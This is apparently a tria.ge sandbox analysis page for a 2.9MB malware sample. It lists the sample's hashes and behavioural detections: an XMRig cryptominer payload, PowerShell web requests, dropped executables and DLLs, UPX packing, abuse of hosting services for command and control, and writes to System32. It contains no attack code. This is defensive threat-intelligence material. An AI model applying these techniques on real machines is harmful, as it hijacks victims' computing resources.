Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    efdd5405ba012bc1bc269c43bea30130_NEAS

  • Size

    2.9MB

  • Sample

    240507-v16fmaaf94

  • MD5

    efdd5405ba012bc1bc269c43bea30130

  • SHA1

    46e976281f9675f131fc3f26aaf5b6816226289c

  • SHA256

    03653fde53a203d14c9391b76b18649da3b42ab062863912341d15506c2cac69

  • SHA512

    e0bf495458afde9d4c77c7c9ccf4d7363ceb90deddb946b29e40bd6f237c290215977d28ac6436b39854493b1a6589b51d6a36080721468e32f464ceb33e54cf

  • SSDEEP

    49152:S1G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkFfdg6NsIRh4HEx:S1ONtyBeSFkXV1etEKLlWUTOfeiRA2RA

Malware Config

Targets

    • Target

      efdd5405ba012bc1bc269c43bea30130_NEAS

    • Size

      2.9MB

    • MD5

      efdd5405ba012bc1bc269c43bea30130

    • SHA1

      46e976281f9675f131fc3f26aaf5b6816226289c

    • SHA256

      03653fde53a203d14c9391b76b18649da3b42ab062863912341d15506c2cac69

    • SHA512

      e0bf495458afde9d4c77c7c9ccf4d7363ceb90deddb946b29e40bd6f237c290215977d28ac6436b39854493b1a6589b51d6a36080721468e32f464ceb33e54cf

    • SSDEEP

      49152:S1G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkFfdg6NsIRh4HEx:S1ONtyBeSFkXV1etEKLlWUTOfeiRA2RA

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • XMRig Miner payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

    • Executes dropped EXE

    • Loads dropped DLL

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks